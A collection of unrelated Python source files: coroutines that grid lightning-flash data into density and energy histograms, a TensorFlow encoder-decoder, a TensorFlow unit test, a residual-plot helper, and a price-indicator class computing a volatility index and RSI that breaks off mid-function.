x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
if len(x_i) > 0:
footprints = dict(list(zip(flash[flash_id_key], flash[area_key])))
# print 'with points numbering', len(x_i)
unq_idx = unique_vectors(x_i, y_i, z_i, events['flash_id'])
# if x[unq_idx].shape[0] > 1:
fl_id = events['flash_id'][unq_idx]
areas = [footprints[fi] for fi in fl_id] #puts areas in same order as x[unq_idx], y[unq_idx]
# counts normalized by areas
target.send((x[unq_idx],y[unq_idx],z[unq_idx],areas))
del footprints, unq_idx, fl_id, areas
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def point_density(target, weight_key=None, weight_flashes=True,
flash_id_key='flash_id', event_grid_area_fraction_key=None):
""" Sends event x, y, z location directly. If weight_key is provided
also extract the weights from the flash data with variable name matching
weight_key. if weight_flashes=False, use the event data instead of the
flash data.
"""
while True:
events, flash, x, y, z = (yield)
# print 'Doing point density',
x = np.atleast_1d(x)
y = np.atleast_1d(y)
if len(x) > 0:
if weight_key is not None:
if weight_flashes:
weight_lookup = dict(list(zip(flash[flash_id_key],
flash[weight_key])))
#puts weights in same order as x, y
weights = np.fromiter((weight_lookup[fi] for fi in
events['flash_id']), dtype='float64')
else:
weights = events[weight_key]
else:
weights = None
            log.debug('with points numbering %s', len(x))
target.send((x, y, weights))
del events, flash ,x,y,z
@coroutine
def point_density_3d(target, weight_key=None, weight_flashes=True,
flash_id_key='flash_id'):
""" Sends event x, y, z location directly. If weight_key is provided
also extract the weights from the flash data with variable name matching
weight_key. if weight_flashes=False, use the event data instead of the
flash data.
"""
while True:
events, flash, x, y, z = (yield)
# print 'Doing point density',
if len(x) > 0:
if weight_key is not None:
if weight_flashes:
weight_lookup = dict(list(zip(flash[flash_id_key],
flash[weight_key])))
#puts weights in same order as x, y
weights = np.fromiter((weight_lookup[fi] for fi in
events['flash_id']), dtype='float64')
else:
weights = events[weight_key]
else:
weights = None
            log.debug('with points numbering %s', len(x))
target.send((x, y, z, weights))
del events, flash ,x,y,z
@coroutine
def flash_std(x0, y0, dx, dy, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
NOTE: Use of this function is to only find the standard deviation of flash size.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
if len(x_i) > 0:
log.debug(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
            if weight_key is not None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key]**2.)))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def flash_std_3d(x0, y0, z0, dx, dy, dz, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print('Doing extent density',)
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
log.debug(len(x_i))
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, z_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
            if weight_key is not None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key]**2.)))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], z[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def extent_density(x0, y0, dx, dy, target, flash_id_key='flash_id',
weight_key=None, event_grid_area_fraction_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
test_flash_id = 53735
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
            if weight_key is not None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key])))
#puts weights in same order as x[unq_idx], y[unq_idx]
weights = np.fromiter((weight_lookup[fi] for fi in
events[unq_idx]['flash_id']), dtype='float64')
# del weight_lookup
else:
weights = None
if event_grid_area_fraction_key is not None:
# Each event with a unique index is replicated above
# with the representative value for the flash (weights = None
# implies a weight of +1 for each flash). If there is knowledge
# of how much of the underlying grid cell each event fills
# (e.g. from pixel-based event detector), then we can modify
# the weights by how much of the grid cell is filled.
# The logic here presumes that any of the events in the grid
# cell cover as much area as any other, i.e., that the pixels
# doing the event detection don't move during the time of the
# flash.
grid_frac = events[unq_idx][event_grid_area_fraction_key]
else:
grid_frac = None
# Diagnostics
# test_flash_mask = (events['flash_id'] == test_flash_id)
# test_events = events[test_flash_mask]
# if (test_flash_mask.sum() > 0) & (weight_key == 'area'):
# print("Data for flash {0}".format(test_flash_id))
# mesh_xi = test_events['mesh_xi']
# mesh_yi = test_events['mesh_yi']
# mesh_frac = test_events['mesh_frac']
# mesh_t = test_events['time']
# for vals in zip(mesh_t, mesh_frac,
# mesh_xi, x_i[test_flash_mask],
# mesh_yi, y_i[test_flash_mask],
# ):
# print(vals, weight_lookup[test_flash_id])
#
# test_flash_mask = (events[unq_idx]['flash_id'] == test_flash_id)
# test_events = events[unq_idx][test_flash_mask]
# if (test_flash_mask.sum() > 0) & (weight_key == 'area'):
# print("Unique data for flash {0}".format(test_flash_id))
# mesh_xi = test_events['mesh_xi']
# mesh_yi = test_events['mesh_yi']
# mesh_frac = test_events['mesh_frac']
# mesh_t = test_events['time']
# for vals in zip(mesh_t, mesh_frac,
# mesh_xi, x_i[unq_idx][test_flash_mask],
# mesh_yi, y_i[unq_idx][test_flash_mask],
# weights[test_flash_mask]):
# print(vals, weight_lookup[test_flash_id])
target.send((x[unq_idx], y[unq_idx], weights, grid_frac))
del weights, grid_frac, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def extent_density_3d(x0, y0, z0, dx, dy, dz, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print('Doing extent density',)
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
log.debug(len(x_i))
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, z_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
            if weight_key is not None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key])))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], z[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def accumulate_points_on_grid(grid, xedge, yedge, out=None, label='',
grid_frac_weights=False):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
    if out is None:
out = {}
# grid = None
# When we do a calculation like average flash area, we need to sum the
# areas, and sum the flashes, and divide at the end. Otherwise, if we have
# a frame that spans multiple data files (and therefore chunks of
# x,y,weights) we will calculate the sum of the averages due to each chunk
# instead of getting the true average. Therefore, create a set of grids for
# tracking the accumulation, and update the final grid with the new
# accumulation each time through the loop.
count_hist = grid.copy()
total_hist = grid.copy()
have_weights = False
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
# There is an issue with small weights being rounded to
# zero in histogramdd, so multiply by some large value
# and divide it back out later.
# https://github.com/numpy/numpy/issues/9465
# seems to not be necessary for the dynamic range we have
# grid_frac = grid_frac.astype('f8')
# grid_frac_scale = 1.0e5
# grid_frac = grid_frac.astype('f8')*grid_frac_scale
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=grid_frac, normed=False)
count_hist += count.astype(count_hist.dtype)
# if grid_frac_weights:
# count /= grid_frac_scale
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
total_hist += total
del total, edges
# try:
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# except AttributeError:
# # if x,y are each scalars, need to make 1D arrays
# x = np.asarray((x,))
# y = np.asarray((y,))
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
if have_weights:
bad = (count_hist <= 0)
avg = np.asarray(total_hist, dtype='float32')/count_hist
avg[bad] = 0.0
del bad
else:
avg = count_hist
grid[:] = avg[:].astype(grid.dtype)
# grid += count.astype(grid.dtype)
del count, avg
del x, y, weights, grid_frac
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_points_on_grid_3d(grid, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
    if out is None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
                if weights is not None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=weights, normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
## The repeated functions below could probably be folded into the originals,
## but they remain separate: this was the only way to get new gridded fields
## that were not the mean.
#### FOR STANDARD DEVIATION OF A SINGLE FIELD:
@coroutine
def accumulate_points_on_grid_sdev(grid, grid2, xedge, yedge, out=None, label='', grid_frac_weights=True):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
    if out is None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=np.asarray(weights)**2., normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
                        # assign in place so callers keep their reference to 'grid'
                        grid[:] = np.sqrt(grid - grid2**2.)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_points_on_grid_sdev_3d(grid, grid2, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
    if out is None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
                if weights is not None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=np.asarray(weights)**2., normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
                        # assign in place so callers keep their reference to 'grid'
                        grid[:] = np.sqrt(grid - grid2**2.)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
#####For Minima of extensive quantities:
@coroutine
def accumulate_minimum_on_grid(grid, xedge, yedge, out=None, label='', grid_frac_weights=True):
"""
Instead of adding values from the counts produced from new blobs of data as
they arrive, take the minimum of the previous value and the new value at
each grid location. Logic prior to this function must eliminate all but one
of the values at each grid cell, since the histogram process accumulates
    all of the values at that grid cell location for each blob of data that
    arrives.
"""
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
    if out is None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
                    # keep the summed weights in each bin; the minimum logic
                    # below compares these raw values rather than a mean
                    bad = (count <= 0)
                    count = np.asarray(total, dtype='float32')
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
hascount, hasgrid = (count > 0), (grid > 0)
compboth = hasgrid & hascount
countonly = np.isclose(grid, 0) & hascount
minboth = np.minimum(grid[compboth],
count[compboth].astype(grid.dtype))
grid[compboth] = minboth
grid[countonly] = count[countonly].astype(grid.dtype)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
#####FOR TOTAL ENERGY:
@coroutine
def accumulate_energy_on_grid(grid, xedge, yedge, out=None, label='', grid_frac_weights=True):
"""
Like accumulate_points_on_grid, but doesn't normalize by the total count
"""
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
    if out is None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
                    # keep the summed weights (total energy) in each bin
                    bad = (count <= 0)
                    count = np.asarray(total, dtype='float32')
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_energy_on_grid_3d(grid, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
    if out is None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
                if weights is not None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=np.abs(weights), normed=False)
                    # keep the summed absolute weights (total energy) in each bin
                    bad = (count <= 0)
                    count = np.asarray(total, dtype='float32')
count[bad] = 0.0
del total, edges, bad
# try:
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# except AttributeError:
# # if x,y are each scalars, need to make 1D arrays
# x = np.asarray((x,))
# y = np.asarray((y,))
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
# if __name__ == '__main__':
# do_profile=False
# if do_profile:
# import hotshot
# from hotshot import stats
# prof = hotshot.Profile("density_test_profile")
# prof.runcall(example)
# prof.close()
# s=stats.load("density_test_profile")
# s.sort_stats("time").print_stats()
# else:
# x_coord, y_coord, lons, lats, test_grid = example()
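# Illustrative pipeline assembly (a sketch; the 'events'/'flashes' arrays and
# grid parameters are hypothetical, but the stage names are from this module):
#   acc = accumulate_points_on_grid(grid, xedge, yedge, label='extent',
#                                   grid_frac_weights=True)
#   ext = extent_density(x0, y0, dx, dy, acc)
#   src = no_projection('lon', 'lat', 'alt', ext)
#   src.send((events, flashes))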
|
1696981
|
import tensorflow as tf
import model as M
bn_training = True
def conv_layers(inp,reuse=False):
global bn_training
with tf.variable_scope('enc',reuse=reuse):
mod = M.Model(inp)
mod.set_bn_training(bn_training)
mod.convLayer(7,16,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #128
mod.convLayer(5,32,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 64
mod.convLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 32
mod.SelfAttention(8,residual=True)
mod.convLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 16
mod.res_block(64,activation=M.PARAM_LRELU)
mod.res_block(64,activation=M.PARAM_LRELU)
mod.convLayer(5,128,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 8
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.SelfAttention(32)
mod.convLayer(5,128,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 4
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.flatten()
return mod.get_current_layer()
def deconv_layers(inp,reuse=False):
global bn_training
with tf.variable_scope('dec',reuse=reuse):
mod = M.Model(inp)
mod.set_bn_training(bn_training)
mod.reshape([-1,4,4,128])
mod.deconvLayer(5,128, stride=2, activation=M.PARAM_LRELU,batch_norm=True) # 8
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.SelfAttention(32)
mod.deconvLayer(5,64, stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 16
mod.res_block(64,activation=M.PARAM_LRELU)
mod.res_block(64,activation=M.PARAM_LRELU)
mod.deconvLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #32
mod.res_block(64,activation=M.PARAM_LRELU)
feat = mod.deconvLayer(5,32, stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 64
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5, 32, stride=2, activation=M.PARAM_LRELU,batch_norm=True) #128
A = mod.convLayer(5,3,activation=M.PARAM_SIGMOID)
mod.set_current(feat)
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5,32,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 128
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5,16,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #256
C = mod.convLayer(5,3,activation=M.PARAM_TANH)
A = tf.image.resize_images(A,(256,256))
# C = tf.image.resize_images(C,(256,256))
return A,C
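# Illustrative graph wiring (a sketch; assumes the M.Model helpers above and a
# 256x256 RGB input, matching the layer-size comments):
#   inp = tf.placeholder(tf.float32, [None, 256, 256, 3])
#   latent = conv_layers(inp)
#   A, C = deconv_layers(latent)   # A: sigmoid map, C: tanh image, both 256x256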
|
1697069
|
import tensorflow as tf
class NodeSequenceTest(tf.test.TestCase):
def test_node_sequence(self):
neighborhood = tf.constant([
[1, 0, 3, -1],
[2, 1, 0, -1],
])
nodes = tf.constant([
[0.5, 0.5, 0.5],
[1.5, 1.5, 1.5],
[2.5, 2.5, 2.5],
[3.5, 3.5, 3.5],
])
expected = [
[[1.5, 1.5, 1.5], [0.5, 0.5, 0.5], [3.5, 3.5, 3.5], [0, 0, 0]],
[[2.5, 2.5, 2.5], [1.5, 1.5, 1.5], [0.5, 0.5, 0.5], [0, 0, 0]],
]
def _map_features(node):
i = tf.maximum(node, 0)
positive = tf.strided_slice(nodes, [i], [i+1], [1])
negative = tf.zeros([1, 3])
return tf.where(node < 0, negative, positive)
with self.test_session() as sess:
data = tf.reshape(neighborhood, [-1])
data = tf.map_fn(_map_features, data, dtype=tf.float32)
data = tf.reshape(data, [2, 4, 3])
self.assertAllEqual(data.eval(), expected)
|
1697101
|
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from matplotlib import gridspec
sns.set_style("whitegrid")
def plot_residuals(predicted_series,
actual_series,
time_vector,
num_training_points,
num_validation_points,
base_path=None,
file_name=None): # pragma: no cover
"""Plotting function for plotting the predicted series with the residuals.
Parameters
----------
predicted_series : np.array
Predicted vector
actual_series : np.array
Actual response vector
time_vector : np.array
Time vector
num_training_points : integer
Number of points used for training
num_validation_points : integer
Number of points used for validation
    base_path: string (default None)
        Base path for saving the plot
file_name: string (default None)
File name for the plot
"""
fig = plt.figure(figsize=(15, 15))
residuals = actual_series - predicted_series
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axarr = [0, 0]
axarr[0] = plt.subplot(gs[0])
axarr[0].plot(time_vector, predicted_series,
marker='o', label='Predicted', markersize=5,
alpha=0.9, linestyle='-', linewidth=.5)
axarr[0].plot(time_vector, actual_series, marker='o', label='Actual',
markersize=5, linestyle='--')
xlim = plt.xlim()
axarr[0].set_ylim((min(predicted_series)-1, max(predicted_series)+1))
axarr[0].axvspan(xlim[0], time_vector[num_training_points], alpha=0.1,
label='Training set', color='r')
axarr[0].axvspan(time_vector[num_training_points],
time_vector[num_training_points + num_validation_points],
alpha=0.1,
label='Validation set', color='b')
axarr[0].legend()
axarr[0].set_title('Predicted vs Actual plot', fontsize=24)
axarr[0].set_xlabel('Time', fontsize=20)
axarr[0].set_ylabel('Magnitude', fontsize=20)
axarr[1] = plt.subplot(gs[1])
axarr[1].scatter(time_vector.tolist(), residuals.tolist())
xlim = plt.xlim()
ax2_ylim = axarr[1].get_ylim()
axarr[1].axvspan(xlim[0], time_vector[num_training_points], alpha=0.1,
label='Training set', color='r')
axarr[1].axvspan(time_vector[num_training_points],
time_vector[num_training_points + num_validation_points],
alpha=0.1,
label='Validation set', color='b')
axarr[1].legend()
axarr[1].set_title('Residual plot', fontsize=24)
axarr[1].set_xlabel('Time', fontsize=20)
axarr[1].set_ylabel('Residuals', fontsize=20)
axarr[1].set_xlim([min(time_vector), max(time_vector)])
axarr[1].set_ylim(ax2_ylim[0]-1, ax2_ylim[1]+1)
if (base_path is not None and file_name is not None):
plt.savefig(base_path+file_name)
plt.close()
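# Illustrative call (a sketch with synthetic data; pass base_path/file_name to
# save the figure):
#   t = np.arange(100)
#   actual = np.sin(t / 5.0)
#   predicted = actual + np.random.normal(0, 0.1, size=t.shape)
#   plot_residuals(predicted, actual, t, 60, 20)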
|
1697124
|
import pandas as pd
import numpy as np
from typing import List, Optional
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
class Indices:
"""
Price Technical Indicators
"""
def __init__(
self, df: pd.DataFrame, date_col: str = "date", price_col: str = "price"
) -> None:
self.df = df
self.date_col = date_col
self.price_col = price_col
def get_vola_index(
self, volatile_period: Optional[int] = 30
) -> pd.DataFrame:
"""
        Volatility Index is a measure of the market's expectation of
        volatility over the near term.
        Volatility is often described as the "rate and magnitude of changes
        in prices" and in finance is often referred to as risk.
Reference:
www.moneycontrol.com
Returns:
pd.DataFrame: Pandas DataFrame
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
v = np.log(data[self.price_col]).diff().rolling(volatile_period).std() * np.sqrt(365)
df_bvol = pd.DataFrame(data={'BVOL_Index': v})
data = pd.concat([data, df_bvol], join="inner", axis=1)
data = data.dropna()
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
return data
@staticmethod
def get_vola_graph(
data: pd.DataFrame, output_path: Optional[str] = "bvol_index.png"
) -> None:
"""
Make a line graph of volatile index with respect to time
Args:
data(pd.DataFrame): Output of get_vola_index function
output_path(str): Path to save plot
"""
fig, ax = plt.subplots(figsize=(14, 12))
rect = fig.patch
rect.set_facecolor("yellow")
ax1 = plt.subplot(211)
ax1.plot(data["date"], data["price"], color="blue", label="Price")
plt.ylabel("Price", color="red", fontsize=20)
ax1.axes.get_xaxis().set_ticks([])
plt.legend()
ax1.tick_params(axis="y", colors="b")
ax1.grid(color="grey", linestyle="-", linewidth=0.25, alpha=0.5)
ax2 = plt.subplot(212)
ax2.plot(
data["date"], data["BVOL_Index"], color="b", label="BVOL Index"
)
plt.xlabel("Time", color="red", fontsize=20)
plt.ylabel("Volatility Index", color="r", fontsize=20)
plt.legend()
plt.setp(ax2.xaxis.get_majorticklabels(), rotation=90)
ax2.grid(color="grey", linestyle="-", linewidth=0.25, alpha=0.5)
ax2.tick_params(axis="x", colors="b")
ax2.tick_params(axis="y", colors="b")
plt.suptitle("Price and Volatility Index", color="red", fontsize=24)
plt.savefig(output_path, bbox_inches="tight", facecolor="orange")
plt.show()
def get_rsi(self) -> pd.DataFrame:
"""
Type:
Momentum indicator
Computation:
It is based on the average price increase during a period of
rising prices and average price fall during a period of
falling stock prices. Relative Strength Index (RSI) is
plotted between 0 and 100.
What it signals:
            Usually, the market is treated as overbought when RSI
            goes above 70 (80 for highly volatile stocks) and
            oversold when it falls below 30 (20 for highly volatile stocks).
Reference:
https://economictimes.indiatimes.com/
Returns:
pd.DataFrame: Pandas DataFrame with RSI values
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["price_change"] = data[self.price_col] - data[
self.price_col
].shift(1)
data.dropna(inplace=True)
data["gain"] = np.where(data["price_change"] >= 0, data["price_change"], 0)
data["loss"] = np.where(data["price_change"] <= 0, abs(data["price_change"]), 0)
data["gain_average"] = data["gain"].rolling(14).mean()
data["loss_average"] = data["loss"].rolling(14).mean()
data["RS"] = data["gain_average"] / data["loss_average"]
data["RSI_1"] = 100 * (1 - (1 / (1 + data["RS"])))
data["RS_Smooth"] = (
data["gain_average"].shift(1) * 13 + data["gain"]
) / (data["loss_average"].shift(1) * 13 + data["loss"])
data["RSI_2"] = 100 * (1 - (1 / (1 + data["RS_Smooth"])))
data = data.fillna(0).reset_index(drop=True)
data.drop(
[
"gain",
"loss",
"price_change",
"gain_average",
"loss_average",
"RS",
],
axis=1,
inplace=True,
)
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
return data
@staticmethod
def get_rsi_graph(data: pd.DataFrame) -> None:
"""
Plot RSI against date and price
Args:
data(pd.DataFrame): Output of get_rsi function.
"""
fig, ax = plt.subplots(figsize=(14, 12))
rect = fig.patch
rect.set_facecolor("yellow")
ax1 = plt.subplot(211)
ax1.plot(data["date"], data["price"], color="blue", label="Price")
plt.ylabel("Price ($)", color="red", fontsize=20)
ax1.axes.get_xaxis().set_ticks([])
plt.legend()
ax1.tick_params(axis="y", colors="b")
ax2 = plt.subplot(212)
ax2.plot(data["date"], data["RSI_2"], color="b", label="RSI")
